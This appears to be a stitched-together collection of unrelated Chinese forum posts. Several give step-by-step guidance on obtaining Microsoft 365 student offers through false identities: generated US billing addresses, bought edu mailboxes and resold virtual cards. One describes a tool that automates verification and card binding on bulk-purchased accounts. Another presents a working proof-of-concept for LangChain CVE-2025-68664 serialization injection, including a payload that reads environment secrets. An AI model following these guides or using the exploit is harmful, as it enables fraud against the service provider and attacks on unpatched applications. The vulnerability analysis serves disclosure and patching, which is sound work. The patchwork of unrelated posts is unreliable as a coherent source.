一、没有 edu 邮箱

1. 参考教程

没有 edu 邮箱硬薅微软 5 年 Microsoft 365 Premium + copilot 教程
本来想试一下这个方法的，但是点了 “Use a different method” 之后跳转的是这样

大佬的帖子里说是 IP 问题，但是我尝试了美国 / 香港 / 台湾 / 新加坡 / 越南 / 英国的节点都不行，换号 / 注册新号也不行，所以就放弃了

2. 申请一个美国邮箱

站内两篇比较详细的教程，也可自行搜索
关于 “免费白嫖 2-5 年 Copilot” 如何获取 edu 邮箱！
关于如何成为美国大学生（bushi）申请 EDU 邮箱的教程

二、有 edu 邮箱

【实测 ucas.ac.cn 的邮箱也可以】，其他 ac.cn 的我不清楚，待佬友验证

1. 首先有两个兑换链接，要有个印象，而且兑换顺序不能错，否则只有一年的试用期，【没有办法挽救】

• 个人版 - Personal

• 高级版 - Premium

• 整个流程都要时刻注意先 personal 后 premium

  
  

2. 开启代理，我全程用的美国节点

3. 【无痕模式】下打开第一个兑换链接

https://checkout.microsoft365.com/acquire/purchase?language=EN-US&market=US&requestedDuration=Month&scenario=microsoft-365-student&client=poc&campaign=StudentFree12M

3.1 登陆你的微软账号，不限制 edu 账号，任何账号都行

3.2 打开如果是中文的话，左下角切换地区为【美国】，语言为【English】

确认左上角是 “Personal”，点击 “Next”

3.3 选择支付方式，我用的是 Google Pay，其余方式请查阅站内其他帖子是否可行

没有 “Google Pay” 的话可能是网络原因，刷新一下或者换个节点。
【刷新后要确认左上角是 Personal 版本】

3.4 填写教育邮箱，点 “Verify student email”

3.5 登陆教育邮箱，完成验证

3.6 验证后可能是这样的，【不用担心，这不代表验证失败】

不要点 “Continue”，
不要点 “Continue”
不要点 “Continue”
因为他会自动跳高级版的兑换界面，【我第一次用 edu 邮箱验证就是点了这个，后面一顿兑换，发现换的是 Premium 版本】 浪费了我的 edu 邮箱
题外话：我之前尝试不通过 edu 邮箱验证的时候就卡这里了，死活不跳传资料的界面，有没有佬教教我怎么解决

3.7 重新打开第一个兑换链接

https://checkout.microsoft365.com/acquire/purchase?language=EN-US&market=US&requestedDuration=Month&scenario=microsoft-365-student&client=poc&campaign=StudentFree12M

由于我上一步没成功过，所以不太清楚成功之后是怎么操作，但是直接重新打开【个人版】的兑换链接肯定没毛病
【总之确认当前页面是 Personal 版本就行】

3.8 教育邮箱验证成功后是这样的，点【Add billing address】

3.9 填写账单地址

我用的是这个网站生成的美国免税州地址
https://www.abangshou.com/tools/address-generator/56/

上面五个随便选一个应该都行

3.10 学生认证成功，开始试用

填完账单地址后可以看到绿框提示学生认证成功，点击 “Start trial, pay later”

3.11 验证支付方式

Google Pay 的绑卡可以参考站内其他教程，这里就不介绍了
我用的是农行的 VISA 卡，万事达应该也可以，我第一次用的 bybit 欧区万事达也成功了，里面没钱

3.12 兑换成功

邮箱也会收到兑换成功通知，Personal 版本，0 费用，一年

4. 打开第二个兑换链接

https://checkout.microsoft365.com/acquire/purchase?language=zh-TW&market=US&requestedDuration=Month&scenario=microsoft-365-premium&client=poc&campaign=StudentPremiumFree12M

4.1 翻车示例

如果打开是这样，说明之前兑换的就是 Premium 版本，换个号重新来吧，我也不知道怎么拯救，我第一个 edu 邮箱就是这么废的

4.2 切换地区语言

1. 如果显示错误，重新刷新一下
   
   
2. 如果是中文的话，刷新以后快速点左下角切换
   
   

4.3 从个人版转为高级版

整个流程跟下来应该是这样的，直接点 “Next” 就行

4.4 开始兑换高级版

时间显示只能试用一个月是正常的，不用管，“Next” 就行

4.5 选择 Google Pay，然后填写账单地址

4.6 开始试用

这里应该不用重新验证学生资格了，直接 “Start trail, pay later”

4.7 支付

4.8 兑换成功

邮箱也会收到兑换成功通知，Premium 版本，0 费用，5 年，2031 年 1 月 21 日到期

5 关闭自动续订

5.1 在 4.8 兑换成功的界面点 “Get Started”

5.2 管理订阅

5.3 关闭自动续订

5.4 关闭成功

5.5 邮件通知

大概一个多小时以后会收到邮件通知

6 废话

• 第一次写这么长的帖子，markdown 也不是很熟悉，有哪里不当的地方请大家多多包容，有什么的建议也可以提，感恩。

• 当然也特别感谢佬的教程免费白嫖 2-5 年 Copilot（Microsoft365），可用 GPT-5.2，以及帖子里回复的各位佬友

• 乞讨：觉得有用的话可以 V 我 50

最近接触到一款支持自动学生认证的程序，便萌生了为其补充完善功能的想法。开发过程中，我发现某平台可购得单价 3.5 元的邮箱账号，这类账号仅支持手机端登录，且未开启双因素认证（2FA）。针对这一情况，我为程序新增了三项核心功能：2FA 自动设置、年龄验证校验（毕竟没有学生资格的账号，大概率是因为未完成 2FA 验证）、2FA 自动修改，以及虚拟卡自动绑定。

整个项目全程基于 Claude 和 Codex 工具开发，目前已实现根据输入的虚拟卡信息，自动完成年龄验证与卡片绑定的功能。需要说明的是，我并非账号经销商，项目也未植入任何广告。此外，程序尚存不少待修复的 bug，且我后续不会对其进行维护迭代 —— 开发这个工具只是出于个人兴趣，我仅注册了二十个账号用于自身日常开发，完全不涉及任何盈利行为。

需要配置比特浏览器使用，会自动创建窗口，以及你的浏览器配置过密码删除窗口，也会自动删除窗口。

很多账号没有学生资格，以及你被拉入家庭组之后，反重力还是无法用，很大概率就是没有年龄验证，这个很重要。

coze skill 新诞生的好东西

我把我的 skill 上传给 coze，它帮忙生成 coze skill:

tikhub-api-helper.zip, 请按照标准流程帮我适配这个 skill，这个技能文件名是 tikhub-api-helper.zip
我收到了您的 Skill 适配请求。让我先下载并解压这个 Skill 文件，然后按照标准流程进行转换适配。
现在开始适配转换。首先调用凭证工具处理 TikHub API 的授权。

TikHub API Helper Skill 适配完成

已成功将 tikhub-api-helper.zip 适配转换为符合规范的 Skill。

实现概览

核心功能：

• 搜索和查询 TikHub API 端点
• 调用 TikHub API 获取社交媒体平台数据（TikTok、抖音、小红书、Instagram、YouTube 等）
• 支持中英文查询

目录结构

tikhub-api-helper/
├── SKILL.md                 # 入口文档
├── scripts/
│   ├── api_client.py       # TikHub API 客户端（已适配授权）
│   └── api_searcher.py     # API 搜索工具
├── references/
│   └── openapi.json       
└── assets/                 # 静态资源（空目录） 

Skill 已成功打包为 tikhub-api-helper.skill

看看效果

介绍 coze skill 的一般情况：

我的 skill 上线使用情况：

从配置多实例 CPA 和代理池～【不推荐使用】， 更正：【反重力 2api】antigravity-manager 的 429 频率和 CPA 没有太大区别 继续讨论：

既然 CPA 和 antigravity-Manager 没有本质区别，而 CPA 的部署方式更符合我的习惯，那就微调下前端吧

前排叠甲：非官方功能，谨慎使用，如有封禁，概不负责

为认证文件 单独 / 批量代理配置：

设置后会对 json 文件的 proxy_url 进行覆盖操作，已设置的显示为黄色。

反重力凭证，批量 / 单个配置 User Agent header

目前反重力的 user agent 字段写死的老版本值，会在请求时候带上

让 cc 分析了代码，应该会穿透到真实请求上，待测试 (测试完毕会去除这个文本)

凭证 JSON 文件编辑

把原来的凭证信息按钮给删掉了，感觉没啥用，换成了原始 JSON 在线编辑

一些无关紧要的：

信息脱敏按钮

偏好设置浏览器保存：

原来是修改后，更换页面就失效，现在会存在浏览器中，主要是 分页配置 和 脱敏展示按钮

使用方式：

config.yaml 的 panel-github-repository 字段更换为我的仓库地址 https://github.com/escapeWu/Cli-Proxy-API-Management-Center

项目地址：

喜加一 | EPIC 限免（1.23）

本期限免

Rustler - Grand Theft Horse「侠盗猎马人」

移动端

The Forest Quartet「森林四重奏」

下期限免

Definitely Not Fried Chicken「這絕對不是炸雞」

注：游戏截止！1.30，00:00

链接：

官网

即时结账（pc）

即时结账（Android ）

老友们快来 https://www.ami.dev/ 有免费的 Opus 4.5, GPT xhigh /codex, gemini, GLM 4.7 ！！！

我自己已经用了 16$ 的 gpt 5.2 xhigh 还没有到限制。我估计免费限制是在 20$

看看有没有大佬能够做出一个 proxy

一、漏洞简介

CVE编号: CVE-2025-68664

漏洞类型: 序列化注入漏洞 (Serialization Injection)

CVSS评分: 9.3 (严重)

影响组件: LangChain 框架的 dumps() 和 dumpd() 函数

漏洞概述：

LangChain 是一个用于构建基于ai大语言模型(LLM)应用程序的框架。在受影响版本中，dumps() 和 dumpd() 函数在序列化自由格式字典时，未对包含 "lc" 键的字典进行适当的转义处理。"lc" 键是 LangChain 内部用于标识序列化对象的特殊标记。当用户控制的数据包含此键结构时，在反序列化过程中可能被错误地识别为合法的 LangChain 对象，而非普通用户数据，从而导致序列化注入漏洞。

二、影响版本

# 受影响版本

langchain >= 1.0.0 且 < 1.2.5

langchain < 0.3.81

### 已修复版本

langchain >= 0.3.81

langchain >= 1.2.5

三、漏洞原理分析

3.1 序列化机制分析

3.1.1 dumps() 函数实现

# langchain_core/load/dump.py

3.1.2 dumpd() 函数实现

3.2 反序列化机制分析

3.2.1 Reviver 类实现

# langchain_core/load/load.py

关键逻辑:

1. Reviver.\_\_call\_\_() 作为 json.loads() 的 object\_hook 被调用

2. 对于每个字典，检查是否包含 {"lc": 1} 键

3. 如果包含，根据 "type" 字段进行相应处理

4. 对于 {"type": "constructor"}，会：

- 解析 "id" 获取模块路径和类名

- 动态导入模块

- 获取类并验证是否为 Serializable 子类

- 使用 "kwargs" 实例化对象

3.3 漏洞触发流程

# 正常流程（预期行为）

用户数据字典 → dumps() → JSON字符串 → loads() → 用户数据字典

#### 漏洞流程（攻击场景）

恶意字典（包含"lc"键） → dumps() → JSON字符串（保留"lc"键）
→ loads() → Reviver检查"lc"键 → 误识别为LangChain对象 → 实例化恶意对象

3.4 漏洞根源

核心问题: dumps() 和 dumpd() 在序列化普通字典时，未对包含 "lc" 键的字典进行转义或标记，导致用户控制的字典在反序列化时被误认为是 LangChain 序列化对象。

具体表现:

1. 序列化阶段：普通字典中的 "lc" 键被原样保留

2. 反序列化阶段：Reviver 仅通过 {"lc": 1} 判断是否为 LangChain 对象，无法区分用户数据和真实序列化对象

3.5 攻击向量分析

攻击者可以构造如下恶意字典：

malicious\_dict = {

 "lc": 1,

 "type": "constructor",

 "id": \["langchain\_core", "messages", "HumanMessage"\],

 "kwargs": {

 "content": "恶意内容"

 }

}

当这个字典被 dumps() 序列化后，再通过 loads() 反序列化时：

1. Reviver 检测到 {"lc": 1} 和 {"type": "constructor"}

2. 解析 "id" 并导入 langchain\_core.messages.HumanMessage

3. 使用 "kwargs" 实例化 HumanMessage 对象

4. 返回实例化的对象，而非原始字典

**潜在风险**:

- 如果攻击者能够控制 "id" 字段，可能实例化任意 Serializable 子类

- 通过 "kwargs" 可以控制对象初始化参数

- 如果后续代码对反序列化对象有特殊处理，可进一步导致其他安全问题

四、环境搭建

4.1 环境要求

- Python 3.8+

- pip

4.2 安装受影响版本

# 安装受影响版本1.x.x（如 1.2.4）

pip install langchain==1.2.4 langchain-core==1.2.4

# 或者安装其他版本 0.3.x（如0.3.80）

pip install langchain=0.3.8

4.3 验证安装

import langchain_core

print(langchain_core.__version__) # 应显示 1.2.4 或 0.3.80

五、漏洞复现

5.1 编写脚本

``

!/usr/bin/env python3

"""

CVE-2025-68664 漏洞复现脚本

演示序列化注入漏洞

"""

from langchain_core.load import dumps, dumpd, loads, load

def test_vulnerability():

"""测试漏洞：用户控制的字典被误识别为LangChain对象"""

print("[*] 测试1: 基础漏洞复现")

print("=" * 60)

# 构造恶意字典，模拟用户输入

user_controlled_dict = {

"user_data": "正常用户数据",

"malicious": {

"lc": 1,

"type": "constructor",

"id": ["langchain_core", "messages", "HumanMessage"],

"kwargs": {

"content": "这是一个被注入的HumanMessage对象"

}

}

}

print("[+] 原始用户数据:")

print(f" 类型: {type(user_controlled_dict)}")

print(f" 内容: {user_controlled_dict}")

print()

# 序列化

print("[+] 使用 dumps() 序列化...")

serialized = dumps(user_controlled_dict)

print(f" 序列化结果: {serialized[:200]}...")

print()

# 反序列化

print("[+] 使用 loads() 反序列化...")

deserialized = loads(serialized)

print(f" 反序列化后类型: {type(deserialized)}")

print(f" 反序列化后内容: {deserialized}")

print()

# 关键检查：malicious 字段应该还是字典，但实际变成了对象

if "malicious" in deserialized:

malicious_value = deserialized["malicious"]

print(f"[!] malicious 字段类型: {type(malicious_value)}")

print(f"[!] malicious 字段值: {malicious_value}")

# 验证是否被误识别为LangChain对象

from langchain_core.messages import HumanMessage

if isinstance(malicious_value, HumanMessage):

print("[!] 漏洞确认: 用户数据被误识别为 HumanMessage 对象!")

print(f"[!] 对象内容: {malicious_value.content}")

else:

print("[?] 未检测到对象实例化")

print()

def test_dumpd_vulnerability():

"""测试 dumpd() 函数的漏洞"""

print("[*] 测试2: dumpd() 函数漏洞复现")

print("=" * 60)

# 构造恶意字典

malicious_dict = {

"lc": 1,

"type": "constructor",

"id": ["langchain_core", "messages", "AIMessage"],

"kwargs": {

"content": "注入的AIMessage"

}

}

print("[+] 原始字典:")

print(f" 类型: {type(malicious_dict)}")

print(f" 内容: {malicious_dict}")

print()

# 使用 dumpd() 序列化

print("[+] 使用 dumpd() 序列化...")

dumped = dumpd(malicious_dict)

print(f" 类型: {type(dumped)}")

print(f" 内容: {dumped}")

print()

# 使用 load() 反序列化

print("[+] 使用 load() 反序列化...")

loaded = load(dumped)

print(f" 类型: {type(loaded)}")

print(f" 内容: {loaded}")

# 验证

from langchain_core.messages import AIMessage

if isinstance(loaded, AIMessage):

print("[!] 漏洞确认: dumpd() + load() 组合存在漏洞!")

print(f"[!] 对象内容: {loaded.content}")

print()

def test_nested_injection():

"""测试嵌套注入场景"""

print("[*] 测试3: 嵌套字典注入")

print("=" * 60)

# 嵌套结构中的注入

nested_data = {

"level1": {

"level2": {

"level3": {

"lc": 1,

"type": "constructor",

"id": ["langchain_core", "messages", "SystemMessage"],

"kwargs": {

"content": "嵌套注入的SystemMessage"

}

}

}

}

}

print("[+] 嵌套恶意数据:")

print(f" 内容: {nested_data}")

print()

serialized = dumps(nested_data)

deserialized = loads(serialized)

print("[+] 反序列化后:")

print(f" level3 类型: {type(deserialized['level1']['level2']['level3'])}")

print(f" level3 值: {deserialized['level1']['level2']['level3']}")

from langchain_core.messages import SystemMessage

if isinstance(deserialized['level1']['level2']['level3'], SystemMessage):

print("[!] 嵌套注入成功!")

print()

def test_secret_injection():

"""测试 secret 类型注入"""

print("[*] 测试4: Secret 类型注入")

print("=" * 60)

# 构造 secret 类型的注入

secret_injection = {

"lc": 1,

"type": "secret",

"id": ["API_KEY"]

}

print("[+] Secret 注入数据:")

print(f" 内容: {secret_injection}")

print()

serialized = dumps(secret_injection)

deserialized = loads(serialized)

print("[+] 反序列化后:")

print(f" 类型: {type(deserialized)}")

print(f" 值: {deserialized}")

print(f" 说明: 如果环境变量 API_KEY 存在，将返回其值")

print()

if __name__ == "__main__":

print("=" * 60)

print("CVE-2025-68664 LangChain 序列化注入漏洞复现")

print("=" * 60)

print()

try:

test_vulnerability()

test_dumpd_vulnerability()

test_nested_injection()

test_secret_injection()

print("=" * 60)

print("[+] 所有测试完成")

print("=" * 60)

except Exception as e:

print(f"[!] 错误: {e}")

import traceback

traceback.print_exc()

``

5.2 poc演示

5.3 实战场景分析

1.直接 RCE的可能性不高，多重安全限制：

• 只能实例化白名单命名空间中的类（如 langchain_core、langchain_community 等）
• 只能实例化 Serializable 的子类
• 只能通过 kwargs 传递参数（JSON 可序列化）

• 部分命名空间禁止路径加载

• 可能的RCE方法（间接）

路径 1：通过工具类（如 ShellTool、BashTool）

如果 langchain_community 中存在可执行命令的工具类

且应用在反序列化后调用了 run() 或 invoke() 方法

则可能实现 RCE

路径 2：通过链式调用

反序列化后的对象被后续代码调用

调用了危险方法

3.目前来看主要风险如下：

数据篡改：改变数据结构，导致应用逻辑错误

类型混淆：注入对象而非字典，导致类型错误

信息泄露：通过 secret 类型读取环境变量

间接 RCE：如果应用对反序列化对象有不当使用

六、总结

6.1 漏洞总结

CVE-2025-68664 是一个典型的序列化注入漏洞，其核心问题在于：

1. 序列化阶段缺乏验证: dumps() 和 dumpd() 函数在序列化普通字典时，未对包含 "lc" 键的字典进行转义或标记，导致用户控制的特殊键结构被原样保留。

2. 反序列化阶段过度信任: Reviver 类仅通过检查 {"lc": 1} 键来判断是否为 LangChain 序列化对象，无法区分用户数据和真实的序列化对象。

3. 设计缺陷: LangChain 使用特殊键 "lc" 来标识序列化对象，但这个键本身是普通的字典键，没有机制防止用户数据使用相同的键结构。

6.2 修复建议

6.2.1 立即修复措施

1. 升级到安全版本:

bash

pip install --upgrade langchain>=1.2.5

或

pip install --upgrade langchain>=0.3.81

2. 代码审查: 检查项目中所有使用 dumps()、dumpd()、loads()、load() 的地方，确保：

- 不要对不可信输入使用这些函数

- 如果必须处理用户数据，先进行验证和清理

6.3
以上分析过程仅代表个人观点，如有遗漏还请指教，谢谢！

Readify，可以在应用商店直接下载使用！
简介
Readify 是一款完全免费、无广告的 AI 听书应用，支持 Android、iOS、网页端与 Chrome 扩展。它内置 100+ 高品质 AI 音色，涵盖 40+ 种语言，语音自然流畅，几乎可与专业主播媲美。
用户可自由导入 PDF、EPUB、MOBI、AZW3、DOCX、TXT 等多种格式书籍，并通过 AI 搜书功能 直接在线搜索连接的安娜书库，实现一键下载与听读。开发团队还专注于 无障碍优化，与百余名视障用户深度合作，使得 VoiceOver（旁白模式） 下也能流畅操作所有功能。

主打一个 AI 听书，支持的客户端也很多，常见的格式也都基本支持，强力推荐！

基于上一条帖子科研图表 (曲线图) 数据提取工具 (导出 excle 数据)，在功能上完善了一下。
[开源] 科研图表 (曲线图) 数据提取工具 (导出 excle 数据) - 开发调优 - LINUX DO

上次的工具只能绘制点，就存在同一 X 存在相同 Y 值，导致出来的数据不太正确，因此增加了图层编辑模式，支持识别颜色的曲线，以及自建图层，自己瞄着画一遍也行

效果如上，可以删除一些无用的线段

然后接可以直接提取数据了，因为代码是 AI 完成的，有些功能达不到我的预期

这就是提取出来的紫色线段的数据了

再就是增加了一个可以直接调用 origin 绘制，直接生成 opju 文件，用 origin 打开，也支持 自定义 LabTalk 代码，但是我没测试

据官方说，仅支持 2022 及以上版本的 origin 才能支持，还有就是交给工具绘制 origin 时，桌面不能打开 origin 必须保持没有 origin 进程才能正常生成 opju 文件。

GitHub 主代码没有更新，但是上传了 releases，支持一键启动，后面有时间把代码更新一下吧。地址：Release V1.0.1 · yyy-OPS/SciDataExtractor

有用的话点点 star~ 谢谢佬友～

Fuwari Studio 是一个基于 Flutter v3 开发的 Astro Fuwari 静态博客文章编辑软件。

好吧没词了反正好用就对了 (

被举报 AIGC 了，hook 脚本到 github 取吧

时间过得真快，距离上次发话题已经过去几个月，成年人的时间真是不经用。马上过年了，想罢年前一定要发点东西出来的。预祝大家新年快乐。

场景是这样的：
当 claude code 读取代码时，往往倾向于读取整个文件，如果文件非常大（比如 5000 行 +），这样的文本塞进上下文。结果就是：

什么是 “渐进式披露”？

举个例子，这就好比一个人类程序员接手新项目时，不会上来就把 10 万行代码从头到尾读一遍。你会先看目录结构（ls），再搜关键字（grep），最后只打开相关的那几十行代码（read）。

Anthropic 的文档里一直强调这一点：让模型先通过搜索定位，再通过切片读取。

但在实际的行时，claude code 执 “太勤快”，往往是直接 Read 整个文件。所以，我们需要给它装一个 “防呆开关”。

这个 Hook 是怎么工作的？

这是一个 Python 脚本，在 PreToolUse 时的 Hook（工具调用前拦截），配合 CLAUDE.md 的提示词，组合引导 claude code 读取精确上下文。

核心逻辑

这个方案由两部分组成：

为什么这个方法 Work？

这利用了 LLM 的一个特性：它们非常听 “报错信息” 的话。

当 Tool Use 失败并返回一个明确的 “推荐路径” 时，claude code 会立刻进行自我修正。

这样就强行把它拽回了 “渐进式披露” 的最佳实践路径上。

如何食用

你需要两个东西：一个是配置在项目根目录的规则文件，一个是实际执行拦截的 Python 脚本。

1. 提示词 (CLAUDE.md)

把这段加到你的项目提示词文件 (CLAUDE.md \ AGENTS.md) 中。告诉 claude code 读取策略。

中文版本

### 文件读取策略 **强制规则**：每次调用 Read 工具时**必须**指定 `offset` 和 `limit` 参数，禁止使用默认值。

#### 参数要求

| 参数   | 要求           | 说明                          |
| ------ | -------------- | ----------------------------- |
| `offset` | **必须指定** | 起始行号（从 0 开始）         |
| `limit`  | **必须指定** | 读取行数，单次不超过 500 行   |

#### 读取流程 1. **侦察**：先用 Grep 了解文件结构，或定位目标关键词行号。
2. **精准打击**：使用 offset + limit 精确读取目标区域。
3. **扩展**：如果需要更多上下文，再调整 offset 继续读取。

**目标**：保持上下文精准、最小化。如果不遵守，工具调用将被 Hook 拦截。

English Version

### File Reading Strategy **MANDATORY RULE**: Every `Read` tool call **MUST** verify `offset` and `limit` parameters. Default full-file reads are prohibited for non-trivial files.

#### Parameter Requirements

| Param    | Requirement    | Description                   |
| -------- | -------------- | ----------------------------- |
| `offset` | **REQUIRED** | Start line number (0-indexed) |
| `limit`  | **REQUIRED** | Max lines to read (Max 500)   |

#### Workflow 1. **Recon**: Use `Grep` first to understand structure or locate keywords.
2. **Surgical Read**: Use `offset` + `limit` to read only the relevant section.
3. **Expand**: Adjust `offset` to read more context only if strictly necessary.

**Goal**: Keep context precise and minimal. Violations will be blocked by the PreToolUse hook.

2. Hook (Python 脚本)

从上面 github 仓库获取 hook 文件，并配置到你的 claude code（如果不熟悉可以直接把文件丢给 claude code 让他代劳）。

(这个脚本稍微有点长，但逻辑很简单：检查文件大小 → 检查参数 → 决定是放行、自动修正还是报错拦截)

效果

装上这一套之后，你会发现 claude code 的行为模式变了：

虽然多了一步交互，但上下文极其干净，Token 消耗量大大降低，而且修改的准确率反而提高了。

写在前面

按照佬的教程 免费白嫖 2-5 年 Copilot（Microsoft365），可用 GPT-5.2 成功用两个账号分别申请到了 2 年和 5 年的羊毛，激动之余汇总一下自己申请过程中遇到的坑以及如何成功申请五年的。

贴主为在读博士生，自己有 edu 邮箱，所以以下注意点不包括如何获取 edu 邮箱，如有需要可以看这里 关于 “免费白嫖 2-5 年 Copilot” 如何获取 edu 邮箱！

2 年的

我用的是 QQ 邮箱注册的 Microsoft 账号 + 博士学校的 edu 邮箱验证，其实很好成功，就是按照佬最开始的教程里里面手动把链接里的 US 改成 HK，用国区 Visa 绑 Paypal 就可以成功申请了。

这里验证了如果不换区的话国区 Visa 是不能过第一个链接的（来自不死心尝试了很多次的经验）。

这里注意，千万不要这时候直接去过第二个链接，不然只有一年的高级版，请看佬友的血泪教训 白嫖 Microsoft365 血泪：只有 1 年！

5 年的

5 年的重要问题就卡在怎么获取美区支付方式，这里请大家移步海鲜市场，50 软妹币购买一张 5 刀的虚拟卡（注意一定要提前问清是可绑 paypal 和 google pay 的独立卡，而不是只能过验证的虚拟卡，两个不一样不一样说两遍），拿到卡信息后去 google pay 进行注册和绑卡，绑卡成功我们就可以去过链接了。

这里用的是美区 Gmail 邮箱重新注册 Microsoft 账号 + 本科学校的校友邮箱验证（再次证明了邮箱不是重点，支付方式才是），然后一样先点第一个链接，支付方式选择 google pay，验证成功后再点第二个链接–成功升级！五年白嫖到手～

共通的注意事项

• 节点的干净度非常非常非常重要！一般出现 “对不起我们出问题了请稍后再试” 或者中间突然断掉一般都是节点的问题，而且一定要开全局，我出现了两次换全局模式就好了
• 第一次过港区的时候，我是换链接（US-HK）同时换了香港节点，两个链接都没出问题地过了
• 第二次过美区出了个岔子，第二个链接怎么都过不了，显示稍后再试，这个时候注意用无痕模式重新开一个窗口，把链接复制过去打开就好了，我估计是我今天早些时候在没开的情况下上网被检测出来了。

Ok 这就是全部的内容啦，其实佬的教程已经非常详细了，很多解决方案评论区也有，我只是把自己过程中遇到的问题和解决方法汇总整理了一下（主要是出于一定要拿到 5 年的执念），希望能帮大家节省一些时间。

如果有帮助的话默默求个赞～孩子好穷上不起

经常在对话中 如果是 claude 帮你构建啊 electron 打包啊
导致反代 400 了

然后看日志你会发现都在上下文里啊！！
这下好了当前对话崩了只能换 gemini 来修复。。对话后续上才能切回 claude 继续对话

最好的办法就是提示词里安排 gemini 专家去子代理窗口构建打包什么的！
以后只要比较长的输出日志啊 什么的都让子代理 gemini 去干活
指定下～～～